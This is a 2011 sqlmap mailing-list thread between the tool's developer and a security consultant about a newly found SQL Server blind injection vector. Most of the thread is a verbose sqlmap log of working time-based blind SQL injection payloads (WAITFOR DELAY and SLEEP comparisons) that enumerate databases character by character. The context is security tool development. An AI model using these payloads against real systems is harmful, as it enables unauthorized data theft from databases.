Re: [sqlmap-users] New SQL Server blind test
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] New SQL Server blind test
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:08:52
|
"Since you seem anxious, I'll send the warm up." - you've thought that i was kidding :) it was really a sincere mail and this is the core part: "it's looks like an SQL abomination, and I can't still believe, but it appears that this really works" On Tue, Jan 18, 2011 at 3:05 AM, Miroslav Stampar <mir...@gm...> wrote: > well, i've apologized already. i've realized 15 minutes ago that this > really is a new sql injection vector. > > you can find yourself in the latest revision commit of doc/THANKS file. > > kr > > On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote: >> On 01/17/2011 08:25 PM, Miroslav Stampar wrote: >>> ok, fair enough. >>> >>> please just send one of payloads used for data retrieval (something >>> like this one): >>> >>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ >>> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > >>> 104), SLEEP(5), 9290) >>> >>> you'll see them with -v 3. you can censor table names. please, i just >>> want to see something workable used for data retrieval (just spot >>> those payloads with '>' inside) >>> >>> kr >> >> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part >> yet. ;-) >> >> [09:41:40] [INFO] fetching database names >> [09:41:40] [INFO] fetching number of databases >> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:41:40] [WARNING] time-based comparison needs larger statistical >> model. Making a few dummy requests, please wait.. >> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi >> [09:43:37] [INFO] retrieved: 24 >> [09:43:37] [DEBUG] performed 10 queries in 117 seconds >> >> >> >> -- >> | Steven Pinkham, Security Consultant | >> | http://www.mavensecurity.com | >> | GPG public key ID CD31CAFB | >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
